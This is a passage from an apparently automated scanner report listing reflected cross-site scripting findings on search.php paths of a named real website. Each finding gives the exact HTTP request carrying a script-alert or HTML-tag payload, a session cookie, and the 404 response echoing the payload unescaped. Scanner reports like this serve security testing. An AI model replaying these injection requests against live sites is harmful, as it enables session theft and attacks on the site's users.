<p>The requested URL /web-service/domain-names/themes/kosmos6571e<script>alert(1)</script>b5e78cd5151/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5079. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a72d2<script>alert(1)</script>7d02c8f8229 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/imagesa72d2<script>alert(1)</script>7d02c8f8229/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/imagesa72d2<script>alert(1)</script>7d02c8f8229/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5080. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a01ba<script>alert(1)</script>d1c270ef554 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/search.phpa01ba<script>alert(1)</script>d1c270ef554?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/search.phpa01ba<script>alert(1)</script>d1c270ef554?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5081. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7cc36<a>40a25cf465d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7cc36<a>40a25cf465d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7cc36<a>40a25cf465d&opt=2 was not found on this server.</p>
...[SNIP]...

2.5082. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload abfeb<a>79eec471bbe was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...abfeb<a>79eec471bbe&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...abfeb<a>79eec471bbe&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5083. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 12ce6<script>alert(1)</script>31fe1fb8750 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&12ce6<script>alert(1)</script>31fe1fb8750=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&12ce6<script>alert(1)</script>31fe1fb8750=1 was not found on this server.</p>
...[SNIP]...

2.5084. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4a46d<a>701849ecf09 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=24a46d<a>701849ecf09 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=24a46d<a>701849ecf09 was not found on this server.</p>
...[SNIP]...

2.5085. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20362<script>alert(1)</script>39b947b7596 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service20362<script>alert(1)</script>39b947b7596/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service20362<script>alert(1)</script>39b947b7596/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5086. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 19ab6<script>alert(1)</script>99ebae2d55b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names19ab6<script>alert(1)</script>99ebae2d55b/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names19ab6<script>alert(1)</script>99ebae2d55b/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5087. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 44892<script>alert(1)</script>82a0188ed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes44892<script>alert(1)</script>82a0188ed/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes44892<script>alert(1)</script>82a0188ed/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5088. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4b2d3<script>alert(1)</script>4e68308df5d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos4b2d3<script>alert(1)</script>4e68308df5d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos4b2d3<script>alert(1)</script>4e68308df5d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5089. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bf66b<script>alert(1)</script>dde3b5e4e68 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/search.phpbf66b<script>alert(1)</script>dde3b5e4e68?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/search.phpbf66b<script>alert(1)</script>dde3b5e4e68?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5090. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3c571<a>0731e0313a0 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search3c571<a>0731e0313a0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search3c571<a>0731e0313a0&opt=2 was not found on this server.</p>
...[SNIP]...

2.5091. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 190ae<a>5414131be3d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/search.php?keyword=search...190ae<a>5414131be3d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/search.php?keyword=search...190ae<a>5414131be3d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5092. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2eefb<script>alert(1)</script>0d1ce670798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&2eefb<script>alert(1)</script>0d1ce670798=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&2eefb<script>alert(1)</script>0d1ce670798=1 was not found on this server.</p>
...[SNIP]...

2.5093. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4fe7d<a>06dd9bbdfa8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=24fe7d<a>06dd9bbdfa8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=24fe7d<a>06dd9bbdfa8 was not found on this server.</p>
...[SNIP]...

2.5094. http://www.resellerbase.com/web-service/domain-names/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b1307<script>alert(1)</script>55abc4629f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceb1307<script>alert(1)</script>55abc4629f5/domain-names/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceb1307<script>alert(1)</script>55abc4629f5/domain-names/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5095. http://www.resellerbase.com/web-service/domain-names/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7900c<script>alert(1)</script>2036380b5d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names7900c<script>alert(1)</script>2036380b5d2/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names7900c<script>alert(1)</script>2036380b5d2/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5096. http://www.resellerbase.com/web-service/domain-names/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b9829<script>alert(1)</script>1d930b4b6bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themesb9829<script>alert(1)</script>1d930b4b6bb/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
